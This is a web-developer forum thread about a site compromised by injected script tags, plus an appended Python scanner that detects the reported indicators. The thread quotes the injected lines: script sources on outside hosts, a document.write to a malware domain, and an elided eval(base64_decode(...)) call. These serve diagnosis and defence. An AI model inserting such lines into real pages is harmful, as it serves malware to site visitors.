www.webdeveloper.com

Thread: [RESOLVED] Possible Javascript Injection

  1. #1
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12

    [RESOLVED] Possible Javascript Injection

    On uploading files (PHP and JavaScript) to the server from my local machine via Dreamweaver, Google Chrome reported the presence of malicious code (like loto-49) inside the server page. Later when I checked, I found that a
    HTML Code:
    document.write('....loto-49.com....');
    was automatically added at the end of each JavaScript *.js file. On their removal, the warnings were gone.

    Recently, they appeared again. Between the closure of the head tag (</head>) and the start of the body tag (<body>) the following code is added automatically:
    HTML Code:
    <script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>
    I checked the local files (both PHP and JavaScript) and later downloaded the same from the server and re-checked them. But I couldn't find the possible cause or any occurrences of the above script code snippet.

    Can anyone throw light upon this? My site is being blacklisted by Chrome.

  2. #2
    Join Date
    Mar 2007
    Posts
    946
    Could it be coming from the database, that is, if your site is using a database?

  3. #3
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    I'm using a database indeed. But the portion where the code is inserted does not contain any database print. The code of the page is like:

    PHP Code:
    <?php require 'template/header.php'?>
    <title>The title</title>
    </head>
    (THE CODE IS INSERTED HERE)
    <body>
        <?php require 'template/top.php'?>
        <table class="bodytabidx">
        <tr>
        <td class="linktd">
            <?php require 'category_list.php'?>
        </td>
        <td class="cata_bodytd">
        <div id="disppro">
        <?php require 'product_display.php'?>
        </div>
        </td>
        </tr>
        </table>
        <?php
            require 'template/footer.php';
            mysql_close($conn);
        ?>
    </body>
    </html>

  4. #4
    Join Date
    Mar 2007
    Posts
    946
    Check to see if a user figured out a way to enter info into your database.

  5. #5
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    But how (and from where) can it be injected in such a place where the actual code is clean (does not have any echo/print/document.write there)?

    Some more details of the error:

    http://safebrowsing.clients.google.c...hrome&hl=en-US

  6. #6
    Join Date
    Jan 2010
    Location
    Great Britian
    Posts
    21
    FTP could be another hack. Gumblar works on the principle that the file download offered (usually a PDF) is the infection point and what steals passwords and logins to FTP and then logs in, grabs the index page, modifies it and then uploads back to the server.

    (So go now, change your login to your server. If that cures it, then consider moving all your development to a separate user account on your computer and keep one user account for web surfing, etc. Safest policy if you work on one machine but also surf from it.)

    OR...

    Check with the web host company that they have not done this or if the server has been compromised by a new client, etc. Poor back-end security and a buggy PHP and SQL all go miles to helping the hackers.

    Check what PHP and SQL versions you're running on. If your host is running PHP < 5.0 then you possibly are being hacked through PHP itself from a known security bug that allows for server-side hacks to be made. MySQL is another technology that people will hack and inject data into if they find hackable or exploitable PHP installs.

    So start asking questions of your host and whether they have any server-side firewalls. I am not talking about what is on the outside but internals: do they have a firewall policy between servers and networks connected to them, or are they an eggs-in-one-basket host? (in it for the money)

  7. #7
    Join Date
    May 2003
    Location
    Between Baltimore and DC
    Posts
    3,579
    Tell your hosting provider about the problem and they should be able to help you figure it out.

    Eric

  8. #8
    Join Date
    Sep 2007
    Location
    INDIA
    Posts
    12
    Thanks for your response. Some extra code was added into some PHP files as:

    PHP Code:
    <?php eval(base64_decode('....')); ?>
    Again, a lot of thanks to you all for taking out your time and replying.
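
The three insertions reported in this thread (a `document.write` appended to `.js` files, `<script src=...>` tags between `</head>` and `<body>`, and `eval(base64_decode(...))` in PHP files) can be searched for in a downloaded copy of the site. The following is an added example, not part of any poster's message; the regexes, function names and sample strings are this example's own assumptions and constructed data.

```python
import os
import re

# Indicators come from the thread; the regexes are this example's assumptions.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
HEAD_BODY_GAP = re.compile(r"</head\s*>(.*?)<body\b", re.I | re.S)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
TRAILING_WRITE = re.compile(r"document\.write\s*\([^\n]*\)\s*;?\s*\Z")


def scan_text(name, text):
    """Return (indicator, detail) findings for one file's contents."""
    findings = []
    if EVAL_B64.search(text):
        findings.append(("eval-base64", "eval(base64_decode(...)) call"))
    # Nothing legitimate belongs between </head> and <body>; report any script there.
    for gap in HEAD_BODY_GAP.findall(text):
        for src in SCRIPT_SRC.findall(gap):
            findings.append(("script-after-head", src))
    # A document.write as the very last statement of a .js file matches post #1.
    if name.lower().endswith(".js") and TRAILING_WRITE.search(text):
        last_line = text.rstrip().splitlines()[-1][:80]
        findings.append(("trailing-document-write", last_line))
    return findings


def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Walk a downloaded copy of the site and map path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fn, fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples modelled on the snippets quoted in the thread.
SAMPLE_PAGE = ("<title>The title</title>\n</head>\n"
               "<script src=http://injected.example/images/gifimg.php ></script>\n"
               "<body>\n<p>ok</p></body></html>")
SAMPLE_JS = "function f(){return 1;}\ndocument.write('<iframe src=x></iframe>');\n"
SAMPLE_PHP = "<?php eval(base64_decode('PLACEHOLDER')); ?>\n<?php echo 'hi'; ?>"

if __name__ == "__main__":
    for n, t in [("index.html", SAMPLE_PAGE), ("menu.js", SAMPLE_JS), ("footer.php", SAMPLE_PHP)]:
        print(n, scan_text(n, t))
```

Run `scan_tree` against a fresh download from the server rather than the local working copy, since in this thread the local files were clean while the served ones were not.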
